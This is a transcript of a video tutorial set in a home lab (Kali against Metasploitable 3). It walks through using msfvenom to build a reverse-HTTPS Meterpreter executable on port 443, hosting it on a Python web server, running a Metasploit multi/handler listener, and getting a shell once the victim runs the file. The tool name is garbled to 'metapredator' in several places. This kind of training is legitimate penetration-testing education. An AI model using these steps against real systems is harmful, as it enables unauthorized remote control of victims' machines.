Greetings, I'm Professor K, and in this short video presentation, we're going to take a look at how we can go about creating an HTTPS payload using Msfvenom. So what do you do to create a reverse shell if the victim has blocked all ports? In such cases, we can create payloads as per the ports running on the victim's machine, such as 443 or HTTPS. For this lab demonstration, I'll be using one virtual install of Kali Linux, one virtual install of Metasploitable 3, and both my VirtualBox adapters have been set to host-only networking. So the first thing we need to do is to discover the IP addresses for both our target and for our Kali. To do this, I'm going to bring up my target machine. Once I'm at the desktop, I'm going to go to Start, and I'm going to bring up the command prompt. Once you're at the command prompt, just type in ipconfig. When you have all that typed in correctly, just hit enter. And the IP address for my local area connection is 192.168.56.103. This is the IP address for my target machine. Your IP address may differ. Let's go on back over to our Kali machine. And let's bring up a terminal. And at the terminal, you're going to type in ifconfig. When you have all that typed in correctly, go ahead and hit enter. And we're going to be looking for the IP address that's assigned to my Ethernet 0 adapter. Currently, the IP address assigned to my Ethernet 0 adapter is 192.168.56.101. This is the IP address for my Kali machine. Your IP address may differ. To ensure that you have a trouble-free lab experience, you can check your connectivity between your Kali machine and your target machine by doing a ping over to the target from your Kali machine. So on my Kali machine, I've opened up a terminal. At the prompt, I've typed in ping, I gave it a space, and I type in the IP address of my target machine, 192.168.56.103. When everything's typed in correctly, I just hit enter, and I have positive responses coming back from the target. Now to break out of this sequence, I just hit Control-C, and I'm back to my prompt. Go ahead and close out your terminal. For this lab, we will need to have a working folder, and I'm going to place this working folder on my desktop. So anywhere on your desktop, just right-click, and from the context menu, you're going to select Create Folder. Give your folder a user-friendly name. I've called mine Shellcodes, but you are free to name yours anything you choose. Once you have that typed in correctly, just go ahead and click on the Create button. Find the working folder on your desktop, right-click on it, and from the context menu, you're going to select Open Terminal here. To create our HTTPS payload using Msfvenom, at the prompt, I've typed in Msfvenom, I give it a space, -P, which stands for payload. Give it a space. The payload we will be using is Windows/metapredator/reverse_HTTPS. Give it a space. Now we're going to type in the local host IP address, which is the same IP address being used by my Kali machine. So at the prompt, I've typed in lhost equals 192.168.56.101. Give it a space. Now I have to type in the listening port. We're going to be using HTTPS. So the listening port is going to equal 443. Give it a space. I need to generate an exe file type. To do this, I've typed in -F, give it a space, followed by exe, give it a space, followed by the greater than sign. So at the prompt, I've typed in /root, /desktop, / the name of my working folder, which is shellcodes, / followed by the name of the executable. And for this demonstration, that executable is going to be called 443.exe. Once you have everything typed in correctly, go ahead and hit enter. Now it takes a couple of seconds for Msfvenom to generate this payload, so do be patient. The payload has been generated, and we can now close out this prompt. From our desktop, we're going to find our working folder. Let's open it up, and you'll see that I have that payload we generated entitled 443.exe present. Go ahead and close out your working folder. To deliver our payload to the victim, we're going to create a working web server inside of our working directory. To do this, we're going to right click on our working folder. From the context menu, let's select Open Terminal here. To create a working web server, I'm going to be using Python 3. So at the prompt, I've typed in Python 3 space dash small letter M, give it a space. Now I'm going to type in the name of the Python module we will be using. So I've typed in http.server. Once you have everything typed in correctly, go ahead and hit enter. Now my Python 3 simple HTTP server is listing on port 8000, and it is running inside of my working folder shellcodes. Make sure you leave your web server up and running. Now you can minimize the prompt, but you cannot close it. We next need to create a Metasploit listener. To do this, we're going to open up a fresh terminal, and at the prompt we're going to type in MSF console. Once you have that typed in correctly, go ahead and hit enter. The first thing we need to do is to identify or tell Metasploit what exploit we want to use. So at the Metasploit prompt, I've typed in use, give it a space, exploit /multi/handler. If you have that typed in, go ahead and hit enter. We next need to identify the payload that the exploit will be using. So at the prompt, I've typed in set space payload space Windows /metapredator /reverse_HTTPS. Hit enter. We next need to set the IP address for the local host, which is going to be the IP address for my Kali machine. So at the prompt, I've typed in set space lhost space the IP address of my Kali machine, which is 192.168.56.101. When you have everything typed in correctly, go ahead and hit enter. We next need to set the listening port that Kali will be using to create this reverse shell. So at my prompt, I've typed in set space L port, give it a space, and I've typed in 443. When you have everything typed in correctly, go ahead and hit enter. Once you've typed in everything correctly and you're ready to launch the exploit, at the prompt, all you have to do is type in the word exploit and hit enter. We now have an HTTPS reverse handler on our Kali machine listing on port 443. Let's go on over to our target machine. Once we have a desktop, let's go to the Start button, and from the Start menu, let's select Internet Explorer. In the address bar for your Internet Explorer, you're going to type in http://192.168.56.101:, and the port we're going to be using to connect to that web server that's running up inside of our working folder is 8000. Once you have all that done, just go ahead and hit enter. Our web server is showing us everything that is currently available up inside of our working folder. Now to connect to that listener that is running up inside of my Kali machine, all I have to do is just double click the executable, click on run, click run one more time, and now I can return back on over to my Kali machine, and you can see that I am creating that MetaPredator session one more time using the HTTPS payload. So in this short video presentation, you got to see how we can create a payload that can circumvent the restrictions of not having any ports open on our target machine. Normally they'd have to have port 80 and 443 open so that they can have HTTP and secure HTTPS running on their machine. I'm Professor K. Thanks for watching, and I'll see you in my next video.